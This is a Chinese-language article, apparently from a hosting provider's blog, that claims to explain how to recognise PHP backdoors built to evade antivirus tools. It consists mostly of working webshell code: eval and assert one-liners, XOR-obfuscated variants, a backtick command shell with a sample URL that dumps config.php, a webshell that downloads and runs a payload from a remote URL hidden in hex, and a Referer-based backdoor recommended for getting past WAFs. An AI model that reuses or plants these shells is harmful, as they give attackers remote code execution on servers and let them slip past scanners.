如何識別簡單的免查殺PHP后門

本篇內容介紹了“如何識別簡單的免查殺PHP后門”的有關知識，在實際案例的操作過程中，不少人都會遇到這樣的困境，接下來就讓小編帶領大家學習一下如何處理這些情況吧！希望大家仔細閱讀，能夠學有所成！

一個最常見的一句話后門可能寫作這樣

<?php @eval($_POST['cmd']);?>

或這樣

<?php @assert($_POST['cmd']);?>

tudouya 同學在FREEBUF上給出[一種構造技巧]利用

復制代碼 代碼如下:

<?php  @$_++; // $_ = 1  $__=("#"^"|"); // $__ = _   $__.=("."^"~"); // _P   $__.=("/"^"`"); // _PO   $__.=("|"^"/"); // _POS   $__.=("{"^"/"); // _POST   ${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);  ?>

構造生成,當然,嫌太直觀可以寫作這樣

復制代碼 代碼如下:

<?php @$_++;$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");@${$__}[!$_](${$__}[$_]);?>

然后再填充些普通代碼進行偽裝,一個簡單的”免殺”shell樣本就出現了

我們再來看看號稱史上最簡單免查殺php后門

直接上代碼：

<?php
 
$c=urldecode($_GET['c']);if($c){`$c`;}//完整
 
!$_GET['c']||`{$_GET['c']}`;//精簡
 
/*******************************************************
 * 原理：PHP中``符號包含會當作系統命令執行
 * 示例：http://host/?c=type%20config.php>config.txt
 *    然后就可以下載config.txt查看內容了！
 *    可以試試更變態的命令，不要干壞事哦！
 *******************************************************/

其實現原理就是PHP會直接將 ` 符號（注意：不是單引號）包含的內容解析為系統命令執行！這樣就可以自由變態地擴展了！

再來看同樣很簡單的一段代碼

<?php 
preg_replace("/[errorpage]/e",@str_rot13('@nffreg($_CBFG[cntr]);'),"saft"); 
?>

密碼page

近期捕獲一個基于PHP實現的webshell樣本，其巧妙的代碼動態生成方式，猥瑣的自身頁面偽裝手法，讓我們在分析這個樣本的過程中感受到相當多的樂趣。接下來就讓我們一同共賞這個奇葩的Webshell吧。

Webshell代碼如下：

<?php
error_reporting(0);
session_start();
header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api']))
$_SESSION['api']=substr(file_get_contents(
sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649);
@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);
?>

關鍵看下面這句代碼，

復制代碼 代碼如下:

sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())

這里執行之后其實是一張圖片，解密出來的圖片地址如下：

http://7shell.googlecode.com/svn/make.jpg?53280b00f1e85
然后調用file_get_contents函數讀取圖片為字符串，然后substr取3649字節之后的內容，再調用gzuncompress解壓，得到真正的代碼。最后調用preg_replace的修飾符e來執行惡意代碼的。這里執行以下語句來還原出惡意樣本代碼，

復制代碼 代碼如下:

<?php
echo gzuncompress(substr(file_get_contents(sprintf('%s?%s',pack("H*",
'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067′),uniqid())),3649));
?>

無特征隱藏PHP一句話：

   <?php 
session_start(); 
$_POST [ 'code' ] && $_SESSION [ 'theCode' ] = trim( $_POST [ 'code' ]); 
$_SESSION [ 'theCode' ]&&preg_replace( '\'a\'eis' , 'e' . 'v' . 'a' . 'l' . '(base64_decode($_SESSION[\'theCode\']))' , 'a' ); 
?>

將$_POST['code']的內容賦值給$_SESSION['theCode']，然后執行$_SESSION['theCode']，亮點是沒有特征碼。用掃描工具來檢查代碼的話，是不會報警的，達到目的了。
超級隱蔽的PHP后門：

<?php $_GET [a]( $_GET [b]);?>

 
僅用GET函數就構成了木馬；
利用方法：
    ?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29};

執行后當前目錄生成c.php一句話木馬，當傳參a為eval時會報錯木馬生成失敗，為assert時同樣報錯，但會生成木馬，真可謂不可小視，簡簡單單的一句話，被延伸到這般應用。
層級請求，編碼運行PHP后門：
此方法用兩個文件實現，文件1
 

 <?php 
//1.php 
header( 'Content-type:text/html;charset=utf-8' ); 
parse_str ( $_SERVER [ 'HTTP_REFERER' ], $a ); 
if (reset( $a ) == '10' && count ( $a ) == 9) { 
eval ( base64_decode ( str_replace ( " " , "+" , implode( array_slice ( $a , 6))))); 
} 

?>

文件2

 <?php 
//2.php 
header( 'Content-type:text/html;charset=utf-8' ); 
//要執行的代碼 
$code = <<<CODE 
phpinfo(); 
CODE; 
//進行base64編碼 
$code = base64_encode ( $code ); 
//構造referer字符串 
$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=" ; 
//后門url 
$url = 'http://localhost/test1/1.php ' ; 
$ch = curl_init(); 
$options = array ( 
CURLOPT_URL => $url , 
CURLOPT_HEADER => FALSE, 
CURLOPT_RETURNTRANSFER => TRUE, 
CURLOPT_REFERER => $referer
); 
curl_setopt_array( $ch , $options ); 
echocurl_exec( $ch ); 

?>

通過HTTP請求中的HTTP_REFERER來運行經過base64編碼的代碼，來達到后門的效果，一般waf對referer這些檢測要松一點，或者沒有檢測。用這個思路bypass waf不錯。

“如何識別簡單的免查殺PHP后門”的內容就介紹到這里了，感謝大家的閱讀。如果想了解更多行業相關的知識可以關注億速云網站，小編將為大家輸出更多高質量的實用文章！